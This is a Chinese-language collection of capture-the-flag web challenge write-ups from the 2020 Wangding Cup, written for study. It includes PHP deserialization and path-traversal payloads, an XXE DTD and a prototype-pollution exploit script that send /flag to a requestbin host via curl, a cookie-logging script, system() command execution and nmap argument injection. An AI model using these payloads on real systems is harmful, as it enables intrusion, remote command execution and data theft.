# 青龙组

## [网鼎杯 2020 青龙组]AreUSerialz

打开页面，通过代码审计，初步思路应该是读取文件即可

```php
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}
```

接下来，按照思路写利用链，　进入process函数后，如果op=="1"，则进入write函数，若op=="2"，则进入read函数，否则输出报错，可以看出来这里op与字符串的比较变成了弱类型比较==

```
<?php
class FileHandler {

    protected $op=2;
    protected $filename= "php://filter/read=convert.base64-encode/resource=flag.php";
    protected $content;


}
$a = new FileHandler();
echo urlencode(serialize($a));
//unserialize(serialize($a));
```

即可读取flag，利用了php7.1+对属性不敏感

> 需要注意的是，$op,$filename,$content三个变量权限都是protected，而protected权限的变量在序列化的时会有%00*%00字符，%00字符的ASCII码为0，就无法通过上面的is_valid函数校验

## [网鼎杯 2020 青龙组]filejava

发现是javaweb发现有下载页面，首先找web.xml

```
DownloadServlet?filename=../../../web.xml
```

xml

```xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/DownloadServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>ListFileServlet</servlet-name>
        <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>ListFileServlet</servlet-name>
        <url-pattern>/ListFileServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/UploadServlet</url-pattern>
    </servlet-mapping>
</web-app>
```

接下来根据javaweb的目录结构尝试读取其他文件，下载下来

```
比如
GET /DownloadServlet?filename=../../../classes/cn/abc/servlet/DownloadServlet.class
```

DownloadServlet.class,过滤flag关键字禁止下载

```java
package cn.abc.servlet;

import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.URLEncoder;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class DownloadServlet extends HttpServlet {
    private static final long serialVersionUID = 1L;

    public DownloadServlet() {
    }

    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        this.doPost(request, response);
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        String fileName = request.getParameter("filename");
        fileName = new String(fileName.getBytes("ISO8859-1"), "UTF-8");
        System.out.println("filename=" + fileName);
        if (fileName != null && fileName.toLowerCase().contains("flag")) {
            request.setAttribute("message", "禁止读取");
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        } else {
            String fileSaveRootPath = this.getServletContext().getRealPath("/WEB-INF/upload");
            String path = this.findFileSavePathByFileName(fileName, fileSaveRootPath);
            File file = new File(path + "/" + fileName);
            if (!file.exists()) {
                request.setAttribute("message", "您要下载的资源已被删除!");
                request.getRequestDispatcher("/message.jsp").forward(request, response);
            } else {
                String realname = fileName.substring(fileName.indexOf("_") + 1);
                response.setHeader("content-disposition", "attachment;filename=" + URLEncoder.encode(realname, "UTF-8"));
                FileInputStream in = new FileInputStream(path + "/" + fileName);
                ServletOutputStream out = response.getOutputStream();
                byte[] buffer = new byte[1024];
                boolean var11 = false;

                int len;
                while((len = in.read(buffer)) > 0) {
                    out.write(buffer, 0, len);
                }

                in.close();
                out.close();
            }
        }
    }

    public String findFileSavePathByFileName(String filename, String saveRootPath) {
        int hashCode = filename.hashCode();
        int dir1 = hashCode & 15;
        int dir2 = (hashCode & 240) >> 4;
        String dir = saveRootPath + "/" + dir1 + "/" + dir2;
        File file = new File(dir);
        if (!file.exists()) {
            file.mkdirs();
        }

        return dir;
    }
}
```

ListFileServlet.class

```java
package cn.abc.servlet;

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class ListFileServlet extends HttpServlet {
    private static final long serialVersionUID = 1L;

    public ListFileServlet() {
    }

    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        this.doPost(request, response);
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        String uploadFilePath = this.getServletContext().getRealPath("/WEB-INF/upload");
        Map<String, String> fileNameMap = new HashMap();
        String saveFilename = (String)request.getAttribute("saveFilename");
        String filename = (String)request.getAttribute("filename");
        System.out.println("saveFilename" + saveFilename);
        System.out.println("filename" + filename);
        saveFilename.substring(saveFilename.indexOf("_") + 1);
        fileNameMap.put(saveFilename, filename);
        request.setAttribute("fileNameMap", fileNameMap);
        request.getRequestDispatcher("/listfile.jsp").forward(request, response);
    }
}
```

UploadServlet.class

```java
package cn.abc.servlet;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.Iterator;
import java.util.List;
import java.util.UUID;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.FileUploadException;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;
import org.apache.poi.openxml4j.exceptions.InvalidFormatException;
import org.apache.poi.ss.usermodel.Sheet;
import org.apache.poi.ss.usermodel.Workbook;
import org.apache.poi.ss.usermodel.WorkbookFactory;

public class UploadServlet extends HttpServlet {
    private static final long serialVersionUID = 1L;

    public UploadServlet() {
    }

    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        this.doPost(request, response);
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        String savePath = this.getServletContext().getRealPath("/WEB-INF/upload");
        String tempPath = this.getServletContext().getRealPath("/WEB-INF/temp");
        File tempFile = new File(tempPath);
        if (!tempFile.exists()) {
            tempFile.mkdir();
        }

        String message = "";

        try {
            DiskFileItemFactory factory = new DiskFileItemFactory();
            factory.setSizeThreshold(102400);
            factory.setRepository(tempFile);
            ServletFileUpload upload = new ServletFileUpload(factory);
            upload.setHeaderEncoding("UTF-8");
            upload.setFileSizeMax(1048576L);
            upload.setSizeMax(10485760L);
            if (!ServletFileUpload.isMultipartContent(request)) {
                return;
            }

            List<FileItem> list = upload.parseRequest(request);
            Iterator var10 = list.iterator();

            label56:
            while(true) {
                while(true) {
                    if (!var10.hasNext()) {
                        break label56;
                    }

                    FileItem fileItem = (FileItem)var10.next();
                    String filename;
                    String fileExtName;
                    if (fileItem.isFormField()) {
                        filename = fileItem.getFieldName();
                        fileExtName = fileItem.getString("UTF-8");
                    } else {
                        filename = fileItem.getName();
                        if (filename != null && !filename.trim().equals("")) {
                            fileExtName = filename.substring(filename.lastIndexOf(".") + 1);
                            InputStream in = fileItem.getInputStream();
                            if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
                                try {
                                    Workbook wb1 = WorkbookFactory.create(in);
                                    Sheet sheet = wb1.getSheetAt(0);
                                    System.out.println(sheet.getFirstRowNum());
                                } catch (InvalidFormatException var20) {
                                    System.err.println("poi-ooxml-3.10 has something wrong");
                                    var20.printStackTrace();
                                }
                            }

                            String saveFilename = this.makeFileName(filename);
                            request.setAttribute("saveFilename", saveFilename);
                            request.setAttribute("filename", filename);
                            String realSavePath = this.makePath(saveFilename, savePath);
                            FileOutputStream out = new FileOutputStream(realSavePath + "/" + saveFilename);
                            byte[] buffer = new byte[1024];
                            boolean var19 = false;

                            int len;
                            while((len = in.read(buffer)) > 0) {
                                out.write(buffer, 0, len);
                            }

                            in.close();
                            out.close();
                            message = "文件上传成功!";
                        }
                    }
                }
            }
        } catch (FileUploadException var21) {
            var21.printStackTrace();
        }

        request.setAttribute("message", message);
        request.getRequestDispatcher("/ListFileServlet").forward(request, response);
    }

    private String makeFileName(String filename) {
        return UUID.randomUUID().toString() + "_" + filename;
    }

    private String makePath(String filename, String savePath) {
        int hashCode = filename.hashCode();
        int dir1 = hashCode & 15;
        int dir2 = (hashCode & 240) >> 4;
        String dir = savePath + "/" + dir1 + "/" + dir2;
        File file = new File(dir);
        if (!file.exists()) {
            file.mkdirs();
        }

        return dir;
    }
}
```

UploadServlet.java有对excel-***.xlsx文件的判断，看网上说是Apache POI XML外部实体漏洞（[参考](https://www.jianshu.com/p/73cd11d83c30)）

服务器端创建evil.dtd

```
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://requestbin.net/r/11wrb1r1?popko=%file;'>">
```

桌面上新建一个excel-1.xlsx文件，解压文件

> 编辑文件[Content_Types].xml，在<?xml version="1.0" encoding="UTF-8" standalone="yes"?>与<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">之间添加内容：

```
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://yourVPS/file.dtd">
%remote;%int;%send;
]>
```

index.php

```php
<?php 
	$cookie = $_GET['q'];
	$myFile = "cookie.txt";
	file_put_contents($myFile, $cookie, FILE_APPEND);
?>
```

之后添加压缩文件为excel-1.xlsx，上传成功即可获取flag

## [网鼎杯 2020 青龙组]notes

看着是nodejs然后是代码审计阶段，自己先研究下发现是一些基本的类似发文章的一些功能，然后在`/status`页面发现可以执行shell，肯定是这个利用点，其他地方都中规中矩的语句，但是他执行命令的地方是在`commands`里面，感觉第一眼应该是需要参数污染

```
let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
```

自己没找到污染的方式，难顶，然后网上看wp发现了[undefsafe存在原型污染](https://snyk.io/vuln/SNYK-JS-UNDEFSAFE-548940)

发现在这里面有两处有此函数一个是get_note另一个是edit部分，很明显应该是edit部分

由于不太懂这个函数，我先在网上看了用法[undefsafe用法](https://www.javascriptcn.com/read-40689.html)

下面是exp，去requestbin创建一个地址

```
import requests

s = requests.session()
data={'raw':'curl -X POST -d "flag=`cat /flag`" http://requestbin.net/r/xxxx11','id':'__proto__','author':'byc_404'}
url='http://0a89b83a-4abf-41ea-b051-e6f8953eec3e.node3.buuoj.cn/'
r=s.post(url+'edit_note',json=data)
print(r.text)
r=s.get(url+"status")
print(r.text)
```

简单解释下通过原型链污染，让上面的commands中多了个键值对叫raw

也就是原来的在污染后变成了下面的

```javascript
let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
    		"raw":"curl -X POST -d "flag=`cat /flag`" http://requestbin.net/r/xxxx11"
        };
```

因此得以成功执行命令

# 朱雀组

## [网鼎杯 2020 朱雀组]phpweb

打开题目环境，没发现源码泄露，尝试BurpSuite抓包

发现关键参数，猜测可以执行任意文件

```
func=date&p=Y-m-d h:i:s a
```

尝试执行phpinfo失败，应该是有waf，尝试读取文件成功

```
func=file_get_contents&p=index.php
```

代码审计

```php
<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>
```

禁用了一堆函数，看见类尝试使用反序列化试试

首先查看phpinfo，看看配置中禁用的函数，发现啥都没有

```
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:1:"1";s:4:"func";s:7:"phpinfo";}
```

简单的使用了ls等命令后未发现flag，使用find命令

```
O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
```

得到结果

```
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/virtual/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/virtual/net/eth1/flags
/tmp/flagoefiu4r93
```

之后cat即可

```
O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
```

## [网鼎杯 2020 朱雀组]Nmap

```
' -iL /flag -oN flag.txt '
```

```
用-iL 把文件名作为选项传给Nmap
```

之后访问flag.txt即可

```
# Nmap 6.47 scan initiated Thu Jan 14 07:15:57 2021 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/fd61f -iL /flag -oN flag.txt \ \\
Failed to resolve "flag{29e8248b-ff71-46ff-8b08-53d0192e158b}".
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Thu Jan 14 07:15:57 2021 -- 0 IP addresses (0 hosts up) scanned in 0.12 seconds
```

# 青龙组

## [网鼎杯 2020 白虎组]PicDown

打开发现参数拼接，会将网址结果返回为jpg文件

```
http://4a6fb514-4e6c-4b72-a635-80be6c793ae6.node3.buuoj.cn/page?url=???
```

尝试访问本地文件失败

```
http://4a6fb514-4e6c-4b72-a635-80be6c793ae6.node3.buuoj.cn/page?url=http://127.0.0.1:80/index.php
```

发现可以目录穿越读取任意文件

```
url=../../../../../../etc/passwd
```

再读取`/proc/self/cmdline`发现结果

```
python2 app.py
```

?url=app.py读一下，得到源码

```python
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
```

程序读取完SECRET_KEY会删除/tmp/secret.txt,但在 linux 系统中如果一个程序打开了一个文件没有关闭，即便从外部（如os.remove(SECRET_FILE)）删除之后，在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd，通过这个我们即可得到被删除文件的内容。/proc/[pid]/fd 这个目录里包含了进程打开文件的情况；；pid就是进程记录的打开文件的序号

`GET /page?url=../../../../../../proc/self/fd/3`

得到

```
Q5/D1nib7wrAzbRJh7TOBL2YubyPFCDb0QbVd3igL7A=
```

尝试发现无回显，那么带外输出即可

```
http://4a6fb514-4e6c-4b72-a635-80be6c793ae6.node3.buuoj.cn/no_one_know_the_manager?key=Q5/D1nib7wrAzbRJh7TOBL2YubyPFCDb0QbVd3igL7A=&shell=curl -X POST -d "flag=`cat /flag`" http://requestbin.net/r/1l5u7d01
```

检查request.bin得到flag

# 玄武组

## [网鼎杯 2020 玄武组]SSRFMe

首先要绕过`check_inner_ip`

本地测试$hostname=$url_parse['host'];取的是最后一个@后面的内容

注释提示我们应当以本地访问hint.php，我们构造如下url传入

```
?url=http://0.0.0.0/hint.php//0.0.0.0的IP地址表示整个网络，代表所有主机的ipv4地址，传入绕过
```

检查端口开放情况，yes

```
url=dict://0.0.0.0:6379
```

